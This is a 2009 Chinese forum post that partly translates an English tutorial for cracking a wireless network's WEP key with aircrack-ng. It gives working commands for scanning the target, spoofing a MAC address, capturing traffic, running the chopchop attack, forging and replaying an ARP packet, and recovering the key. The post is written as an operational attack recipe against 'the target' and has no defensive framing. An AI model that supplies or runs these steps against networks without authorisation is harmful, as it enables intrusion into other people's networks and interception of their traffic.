新兵上阵
- 注册时间
- 2008-10-17
- 金币
- 9 个
- 威望
- 0 个
- 荣誉
- 0 个
尚未签到
|
We will also need to know the target's name (ESSID), MAC address, and the channel. 我们也需要知道目标的名称(ESSID也就是无线路由发出的广播名字),网卡的地址,以及频道.Please note that my wireless device is "eth1" but yours may be different; 请注意我的无线设备的端口名称是ETH1,但是你的可能不同.use "iwconfig" to find out which adaptor is wireless. 用IWCONFIG 去找出哪个是你的无线网卡(If you downloaded aircrack-ng you may need to reset your network adaptor)如果 你下载了AIRCRACK-NG ,你可能需要重新设置你的网卡.
iwlist eth1 scan
Now we can get started. First we must enable rtap0 for listening. rtap0 is required (instead of just eth1) due to limitations in the ipw2200 driver.现在我们能开始了,第一步,我们必须激活RTAP0到监听状态,RTAP0在 IPW2000设备中的限制,RTAP0是必须的(提到刚才说的ETH1)
rmmod ipw2200
modprobe ipw2200 rtap_iface=1
Next enable wireless and change MAC (changing MAC is optional).
ifconfig eth1 up hw ether 00:11:22:33:44:55
Configure wireless w/ essid, channel, and a fake key.
iwconfig eth1 essid <ESSID> channel <#> key s:fakekey mode managed
Now start collecting traffic on rtap0. "dump" is the name of the capture (.cap) file.
airodump-ng --bssid <AP MAC> -w dump rtap0
Now for the actual injection. Open a new terminal (<ctrl><alt><F2> if you are still in the console) and start the aireplay chopchop attack. Note the modifier "-i rtap0." This tells aireplay to use rtap0 for listening and eth1 for injecting. Also "-4" is the type of attack (chopchop).
aireplay-ng -4 -a <AP MAC> -h 00:11:22:33:44:55 -i rtap0 eth1
A prompt will ask you to use "this" packet. Type "y" and the attack should continue. Once it finishes you will have a plaintext (.cap) file and a keystream(.xor) file. The keystream file will look something like "replay_dec-######.xor"
Make sure there are no errors reported after using aireplay. This is where I had the most difficulty. If the attack doesn't start after selecting the packet, you might not be close enough to the AP or the AP is not vulnerable to the chopchop attack. I also received an error stating the checksum didn't match. I just re-ran aireplay and it was fine.
Now we will create an arp-request packet using the aquired keysteam file. The "-l" and "-k" options are the source IP and destination IP. They can be any valid IP. The destination can be the gateway (router IP) but the attack run faster if it is an arbitrary IP.没时间了,先翻译前面部分.
packetforge-ng -0 -a <AP MAC> -h 00:11:22:33:44:55 -k 192.168.1.100 -l 192.168.1.101 -y replay_dec-####.xor -w arp-request
Finally we will send our newly created arp-request packet over and over. After this step you should see the "Data" begin to rise quickly back in the first terminal (airodump). If the data doesn't change (usually between 80 and 350 per second) then something is wrong.
aireplay-ng -2 -r arp-request eth1
Let aireplay run for a few minutes while you collect data. After 75,000 or so you can run aircrack in a third terminal (<ctrl><alt><F3>). Within a few minutes you should have the key.
aircrack-ng -z dump*.cap
谁把关键部分翻页一下,谢谢本文地址:http://forum.anywlan.com/thread-9561-1-1.html |
|
IP卡
狗仔卡
发表于 2009-3-20 19:03
显身卡